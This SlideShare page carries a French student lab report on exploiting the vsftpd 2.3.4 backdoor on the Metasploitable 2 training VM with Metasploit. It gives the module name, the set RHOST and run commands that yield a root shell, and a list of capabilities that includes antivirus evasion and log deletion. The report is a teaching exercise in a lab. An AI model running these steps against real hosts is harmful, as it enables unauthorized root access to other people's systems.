SlideShare une entreprise Scribd logo
1  sur  9
Télécharger pour lire hors ligne
1
SECURITE
Département Génie d’Informatique
Faculté des Sciences et Techniques
TANGER
Rapport
Metasploit et Metasploitable 2
Sécurité
Le 10/12/2018
Master Système Informatique et Mobile
Réalisé par : Encadré par :
 EDAIG KHALID. Mr. BOUDHIR Anouar
2
SECURITE
SOMMAIRE
1. INTRODUCTION............................................................................................................................................3
2. C’EST QUOI METASPLOIT........................................................................................................................... 3
3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3
4. C’EST QUOI MATASPLOITABLE................................................................................................................3
5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4
5.1. Metasploit ..................................................................................................................................................................... 4
6. METASPLOITABLE 2 ...................................................................................................................................6
7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7
8. CONCLUSION .................................................................................................................................................9
3
SECURITE
1. Introduction
Dans ce TP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD
particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2.
2. C’est quoi Metasploit
Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet
de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de
programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby.
Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes
informatiques afin de les protéger, ou par les hackers à des fins de piratage.
3. Qu’est-ce que peut faire avec Metasploit
Le Framework permet de faire énormément de chose comme :
 Le scan et collecte l’ensemble d’informations sur une machine
 Repérage et l’exploitation des vulnérabilités
 Escalade de privilèges et vol de données
 Installation d’une porte dérobée
 Fuzzing
 Echapper à l’antivirus
 Suppression des logs et des traces
4. C’est quoi Matasploitable
Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette
machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et
appliquer des techniques de test de pénétration courantes.
4
SECURITE
5. Installation de Metasploit et Metasploitable2
5.1. Metasploit
Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite.
Bien sûr, Kali est fourni avec la version gratuite.
Figure 1 : les machines virtuelle kali linux et Metasploitable2
Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit,
payload…etc
Qu’est-ce qu’un exploit avec Metasploit
C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On
peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable
Qu’est ce qu’un Payload
C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine
d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore
l’ouverture d’une session VNC.
Qu’est ce qu’un msfconsole
Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit
d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement
sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier
transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits.
Vocabulaire Réseau important
LHOST : lhost est l’adresse IP de l’attaquant
LPORT : C’est le port que vous souhaitez utiliser
RHOST : Ceci est l’adresse IP de la machine victime
RPORT : Le numéro de port de la victime.
5
SECURITE
On va commencer avec Metasploit
 Démarrez le service Kali PostgreSQL.
 Démarrez le service Kali Metasploit.
 Démarrer la msfconsole.
6
SECURITE
 Afficher le status de db
 afficher les différents types d’exploits
6. Metasploitable 2
 Connexion à la machine vm Matasloitable 2
 Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
7
SECURITE
7. Metasploitable 2 – VSFTPD
7.1. Exploiter VSFTPD v2.3.4 avec Metasploit
Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de
donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.
 service postgresql start
 msfdb init
 Msfconsole
Afficher le status de connection à la DB
msf > db_statut
Bien connecté.
Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application
VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4.
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf > show options : pour afficher les différentes options
8
SECURITE
Maintenant on va préciser l’IP de notre hôte-cible par la commande suivante.
msf> set RHOST [IP CIBLE]
Après on va exécuter par la commande run
msf> run
Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière.
-ls /etc pour afficher le contenu du dossier etc.
-on va créer un dossier ‘khalid’
9
SECURITE
8. Conclusion
J’ai exploité une vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service
VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le
terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous
rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que
la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.

Contenu connexe

Tendances

Rapport projet fin d'étude
Rapport projet fin d'étudeRapport projet fin d'étude
Rapport projet fin d'étudeHibaFarhat3
 
Rapport de projet_de_fin_d__tudes__pfe__safwen (8)
Rapport de projet_de_fin_d__tudes__pfe__safwen (8)Rapport de projet_de_fin_d__tudes__pfe__safwen (8)
Rapport de projet_de_fin_d__tudes__pfe__safwen (8)safwenbenfredj
 
rapport PFE ingénieur génie logiciel INSAT
rapport PFE ingénieur génie logiciel INSATrapport PFE ingénieur génie logiciel INSAT
rapport PFE ingénieur génie logiciel INSATSiwar GUEMRI
 
Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)Charif Khrichfa
 
Installer et configurer NAGIOS sous linux
Installer et configurer NAGIOS sous linuxInstaller et configurer NAGIOS sous linux
Installer et configurer NAGIOS sous linuxZakariyaa AIT ELMOUDEN
 
Rapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_web
Rapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_webRapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_web
Rapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_webSalma Gouia
 
Rapport pfe talan_2018_donia_hammami
Rapport pfe talan_2018_donia_hammamiRapport pfe talan_2018_donia_hammami
Rapport pfe talan_2018_donia_hammamiDonia Hammami
 
Rapport pfe isi_Big data Analytique
Rapport pfe isi_Big data AnalytiqueRapport pfe isi_Big data Analytique
Rapport pfe isi_Big data AnalytiqueYosra ADDALI
 
Supervision d'un réseau informatique avec Nagios
Supervision d'un réseau informatique avec NagiosSupervision d'un réseau informatique avec Nagios
Supervision d'un réseau informatique avec Nagioschristedy keihouad
 
Manuel des TP : Atelier systèmes 2
Manuel des TP : Atelier systèmes 2Manuel des TP : Atelier systèmes 2
Manuel des TP : Atelier systèmes 2Faycel Chaoua
 
Securite informatique
Securite informatiqueSecurite informatique
Securite informatiqueSouhaib El
 
Conception et développement d'une application de gestion de production et de ...
Conception et développement d'une application de gestion de production et de ...Conception et développement d'une application de gestion de production et de ...
Conception et développement d'une application de gestion de production et de ...Mohamed Aziz Chetoui
 
sécurité informatique
sécurité informatiquesécurité informatique
sécurité informatiqueMohammed Zaoui
 
Pfe master fst_final_decembre2015
Pfe master fst_final_decembre2015Pfe master fst_final_decembre2015
Pfe master fst_final_decembre2015Ghali Rahma
 
Rapport de projet de fin d’étude
Rapport  de projet de fin d’étudeRapport  de projet de fin d’étude
Rapport de projet de fin d’étudeOumaimaOuedherfi
 
Rapport PFE : Cloud Insights
Rapport PFE : Cloud InsightsRapport PFE : Cloud Insights
Rapport PFE : Cloud Insightsahmed oumezzine
 
Rapport PFE Développent d'une application bancaire mobile
Rapport PFE Développent d'une application bancaire mobileRapport PFE Développent d'une application bancaire mobile
Rapport PFE Développent d'une application bancaire mobileNader Somrani
 

Tendances (20)

Rapport projet fin d'étude
Rapport projet fin d'étudeRapport projet fin d'étude
Rapport projet fin d'étude
 
Rapport de projet_de_fin_d__tudes__pfe__safwen (8)
Rapport de projet_de_fin_d__tudes__pfe__safwen (8)Rapport de projet_de_fin_d__tudes__pfe__safwen (8)
Rapport de projet_de_fin_d__tudes__pfe__safwen (8)
 
rapport PFE ingénieur génie logiciel INSAT
rapport PFE ingénieur génie logiciel INSATrapport PFE ingénieur génie logiciel INSAT
rapport PFE ingénieur génie logiciel INSAT
 
Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)Installation et configuration d'un système de Détection d'intrusion (IDS)
Installation et configuration d'un système de Détection d'intrusion (IDS)
 
Installer et configurer NAGIOS sous linux
Installer et configurer NAGIOS sous linuxInstaller et configurer NAGIOS sous linux
Installer et configurer NAGIOS sous linux
 
Rapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_web
Rapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_webRapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_web
Rapport final pfe_systeme_de_gestion _de_cabinet_de_formation_mobile_web
 
Rapport pfe talan_2018_donia_hammami
Rapport pfe talan_2018_donia_hammamiRapport pfe talan_2018_donia_hammami
Rapport pfe talan_2018_donia_hammami
 
Rapport pfe isi_Big data Analytique
Rapport pfe isi_Big data AnalytiqueRapport pfe isi_Big data Analytique
Rapport pfe isi_Big data Analytique
 
Rapport de stage du fin d'étude
Rapport de stage du fin d'étudeRapport de stage du fin d'étude
Rapport de stage du fin d'étude
 
Supervision d'un réseau informatique avec Nagios
Supervision d'un réseau informatique avec NagiosSupervision d'un réseau informatique avec Nagios
Supervision d'un réseau informatique avec Nagios
 
Manuel des TP : Atelier systèmes 2
Manuel des TP : Atelier systèmes 2Manuel des TP : Atelier systèmes 2
Manuel des TP : Atelier systèmes 2
 
Protection-dun-réseau-dentreprise-via-un-firewall.pdf
Protection-dun-réseau-dentreprise-via-un-firewall.pdfProtection-dun-réseau-dentreprise-via-un-firewall.pdf
Protection-dun-réseau-dentreprise-via-un-firewall.pdf
 
Securite informatique
Securite informatiqueSecurite informatique
Securite informatique
 
Conception et développement d'une application de gestion de production et de ...
Conception et développement d'une application de gestion de production et de ...Conception et développement d'une application de gestion de production et de ...
Conception et développement d'une application de gestion de production et de ...
 
sécurité informatique
sécurité informatiquesécurité informatique
sécurité informatique
 
Pfe master fst_final_decembre2015
Pfe master fst_final_decembre2015Pfe master fst_final_decembre2015
Pfe master fst_final_decembre2015
 
Rapport de projet de fin d’étude
Rapport  de projet de fin d’étudeRapport  de projet de fin d’étude
Rapport de projet de fin d’étude
 
Rapport finiale
Rapport finialeRapport finiale
Rapport finiale
 
Rapport PFE : Cloud Insights
Rapport PFE : Cloud InsightsRapport PFE : Cloud Insights
Rapport PFE : Cloud Insights
 
Rapport PFE Développent d'une application bancaire mobile
Rapport PFE Développent d'une application bancaire mobileRapport PFE Développent d'une application bancaire mobile
Rapport PFE Développent d'une application bancaire mobile
 

Similaire à Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4

Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cuiIdir Gaci
 
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Trésor-Dux LEBANDA
 
Creation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiCreation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiKhalid EDAIG
 
Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?Kiwi Backup
 
White paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRFWhite paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRFManfred Touron
 
Projet de-recherche-Tuteuré
Projet de-recherche-TuteuréProjet de-recherche-Tuteuré
Projet de-recherche-TuteuréRullier Anthony
 
Build automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et JenkinsBuild automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et JenkinsCocoaHeads France
 
Backdoors et rootkits_avancees
Backdoors et rootkits_avanceesBackdoors et rootkits_avancees
Backdoors et rootkits_avanceesUltraUploader
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderMohamed Ben Bouzid
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Hamza Ben Marzouk
 
Ops@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier KrantzOps@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier KrantzOlivier DASINI
 
Reverse Engineering d'un ransomware
Reverse Engineering d'un ransomwareReverse Engineering d'un ransomware
Reverse Engineering d'un ransomwareNinaSAMMUT
 
Supervision rc3a9seau
Supervision rc3a9seauSupervision rc3a9seau
Supervision rc3a9seauMed Ali Bhs
 
Tuto atelier securisation_site_web
Tuto atelier securisation_site_webTuto atelier securisation_site_web
Tuto atelier securisation_site_websahar dridi
 
Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02Gonéri Le Bouder
 
Securisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injectionSecurisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injectionZakaria SMAHI
 
Sec day cuckoo_workshop
Sec day cuckoo_workshopSec day cuckoo_workshop
Sec day cuckoo_workshopThomas Roccia
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursAmen.fr
 

Similaire à Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4 (20)

Rapport de base de données gaci cui
Rapport de base de données gaci cuiRapport de base de données gaci cui
Rapport de base de données gaci cui
 
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
Mise en place d’un laboratoire de sécurité « Scénarios d’Attaques et Détectio...
 
Creation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpiCreation de cluster (Master et deux slave ) nfs, htcondor, mpi
Creation de cluster (Master et deux slave ) nfs, htcondor, mpi
 
Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?Spectre et Meltdown : quels impacts pour vous et vos clients ?
Spectre et Meltdown : quels impacts pour vous et vos clients ?
 
White paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRFWhite paper: SSTIC 2008: Advanced CSRF
White paper: SSTIC 2008: Advanced CSRF
 
Atelier IDS SNORT
Atelier IDS SNORTAtelier IDS SNORT
Atelier IDS SNORT
 
Projet de-recherche-Tuteuré
Projet de-recherche-TuteuréProjet de-recherche-Tuteuré
Projet de-recherche-Tuteuré
 
Build automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et JenkinsBuild automatique et distribution OTA avec Xcode 4.x et Jenkins
Build automatique et distribution OTA avec Xcode 4.x et Jenkins
 
Backdoors et rootkits_avancees
Backdoors et rootkits_avanceesBackdoors et rootkits_avancees
Backdoors et rootkits_avancees
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey Spider
 
rapportWAS
rapportWASrapportWAS
rapportWAS
 
Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015Rapport atelier Web App Security 2015
Rapport atelier Web App Security 2015
 
Ops@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier KrantzOps@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
Ops@viadeo : Puppet & Co... 6 mois après par Xavier Krantz
 
Reverse Engineering d'un ransomware
Reverse Engineering d'un ransomwareReverse Engineering d'un ransomware
Reverse Engineering d'un ransomware
 
Supervision rc3a9seau
Supervision rc3a9seauSupervision rc3a9seau
Supervision rc3a9seau
 
Tuto atelier securisation_site_web
Tuto atelier securisation_site_webTuto atelier securisation_site_web
Tuto atelier securisation_site_web
 
Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02Virt lightning-montreal-linux-meetup-2020-02
Virt lightning-montreal-linux-meetup-2020-02
 
Securisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injectionSecurisation des web services soap contre les attaques par injection
Securisation des web services soap contre les attaques par injection
 
Sec day cuckoo_workshop
Sec day cuckoo_workshopSec day cuckoo_workshop
Sec day cuckoo_workshop
 
Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveurs
 

Metasploit et Metasploitable2 : exploiter VSFTPD v2.3.4

  • 1. 1 SECURITE Département Génie d’Informatique Faculté des Sciences et Techniques TANGER Rapport Metasploit et Metasploitable 2 Sécurité Le 10/12/2018 Master Système Informatique et Mobile Réalisé par : Encadré par :  EDAIG KHALID. Mr. BOUDHIR Anouar
  • 2. 2 SECURITE SOMMAIRE 1. INTRODUCTION............................................................................................................................................3 2. C’EST QUOI METASPLOIT........................................................................................................................... 3 3. QU’EST-CE QUE PEUT FAIRE AVEC METASPLOIT................................................................................3 4. C’EST QUOI MATASPLOITABLE................................................................................................................3 5. INSTALLATION DE METASPLOIT ET METASPLOITABLE2................................................................ 4 5.1. Metasploit ..................................................................................................................................................................... 4 6. METASPLOITABLE 2 ...................................................................................................................................6 7. METASPLOITABLE 2 – VSFTPD ................................................................................................................7 7.1. Exploiter VSFTPD v2.3.4 avec Metasploit....................................................................................................................... 7 8. CONCLUSION .................................................................................................................................................9
  • 3. 3 SECURITE 1. Introduction Dans ce TP , nous allons exploiter VSFTPD v2.3.4 manuellement et avec Metasploit. Cet exploit VSFTPD particulier est assez facile à exploiter et constitue un excellent premier départ sur la boîte Metasploitable 2. 2. C’est quoi Metasploit Metsploit est un outil pour le développement et l’exécution d’exploits contre une machine distante, il permet de réaliser des audits en sécurité, de tester et développer ses propres exploits. Créé à l’origine en langage de programmation Perl, Metasploit Framework a été complètement réécrit en langage Ruby. Il est utilisé souvent par les administrateurs systèmes pour tester les vulnérabilités des systèmes informatiques afin de les protéger, ou par les hackers à des fins de piratage. 3. Qu’est-ce que peut faire avec Metasploit Le Framework permet de faire énormément de chose comme :  Le scan et collecte l’ensemble d’informations sur une machine  Repérage et l’exploitation des vulnérabilités  Escalade de privilèges et vol de données  Installation d’une porte dérobée  Fuzzing  Echapper à l’antivirus  Suppression des logs et des traces 4. C’est quoi Matasploitable Metasploitable2 (Linux) Metasploitable est une machine virtuelle Linux intentionnellement vulnérable. Cette machine virtuelle peut être utilisée pour dispenser une formation à la sécurité, tester des outils de sécurité et appliquer des techniques de test de pénétration courantes.
  • 4. 4 SECURITE 5. Installation de Metasploit et Metasploitable2 5.1. Metasploit Metasploit est pré-installé dans Kali linux . Il existe en version payante et en version gratuite. Bien sûr, Kali est fourni avec la version gratuite. Figure 1 : les machines virtuelle kali linux et Metasploitable2 Avant de commencer avec Metasploit, vous devez connaître quelques termes, comme exploit, payload…etc Qu’est-ce qu’un exploit avec Metasploit C’est des scripts ruby qui nous permettent d’exploiter une vulnérabilité sur une machine distante. On peut dire que l’exploit nous donne la possibilité de se connecter à une machine vulnérable Qu’est ce qu’un Payload C’est le code exécuté après s’être introduit dans la machine cible, il nous permet de contrôler la machine d’une victime. Comme par exemple : l’ouverture d’un port sur la machine relié à un shell ou encore l’ouverture d’une session VNC. Qu’est ce qu’un msfconsole Selon offensive-security, msfencode est un autre excellent petit outil dans l’arsenal du framework lorsqu’il s’agit d’exploiter le développement. La plupart du temps, on ne peut pas simplement utiliser le shellcode généré directement sur msfpayload. Il doit être encodé en fonction de la cible afin de fonctionner correctement. Cela peut signifier transformer votre shellcode en pur alphanumérique, éliminer les mauvais caractères ou l’encoder pour une cible 64 bits. Vocabulaire Réseau important LHOST : lhost est l’adresse IP de l’attaquant LPORT : C’est le port que vous souhaitez utiliser RHOST : Ceci est l’adresse IP de la machine victime RPORT : Le numéro de port de la victime.
  • 5. 5 SECURITE On va commencer avec Metasploit  Démarrez le service Kali PostgreSQL.  Démarrez le service Kali Metasploit.  Démarrer la msfconsole.
  • 6. 6 SECURITE  Afficher le status de db  afficher les différents types d’exploits 6. Metasploitable 2  Connexion à la machine vm Matasloitable 2  Récupérer l'adresse IP de la machine virtuelle Metasploitable 2
  • 7. 7 SECURITE 7. Metasploitable 2 – VSFTPD 7.1. Exploiter VSFTPD v2.3.4 avec Metasploit Tout d’abord, on va installer la dernière version de Kali linux, il vous faut configurer votre base de donnée pour Metasploit. Heureusement pour nous,cela se fait de plus en plus facilement.  service postgresql start  msfdb init  Msfconsole Afficher le status de connection à la DB msf > db_statut Bien connecté. Le Framework Metasploit contient un exploit spécifique pour exploiter la vulnérabilité de l’application VSFTPD de v2.3.4. on utilise Metasploit pour exploiter VSFTPD v2.3.4. msf > use exploit/unix/ftp/vsftpd_234_backdoor msf > show options : pour afficher les différentes options
  • 8. 8 SECURITE Maintenant on va préciser l’IP de notre hôte-cible par la commande suivante. msf> set RHOST [IP CIBLE] Après on va exécuter par la commande run msf> run Maintenant on a une session ouvert dans la machine Matasploitable 2. On va travailler sur cette dernière. -ls /etc pour afficher le contenu du dossier etc. -on va créer un dossier ‘khalid’
  • 9. 9 SECURITE 8. Conclusion J’ai exploité une vulnérabilité de l’application VSFTPD v2.3.4 avec Metasploit. Le service VSFTPD v2.3.4 est en cours d’exécution en tant que root , ce qui nous a donné un ‘shell-root’ sur le terminal. Sachez maintenant que ce tp est à titre d’exemple car il sera très peu probable que vous rencontrez cette vulnérabilité dans une situation actuelle car cette version de VSFTPD est vieille et que la version vulnérable était uniquement disponible qu’un seul jour pour cette démonstration.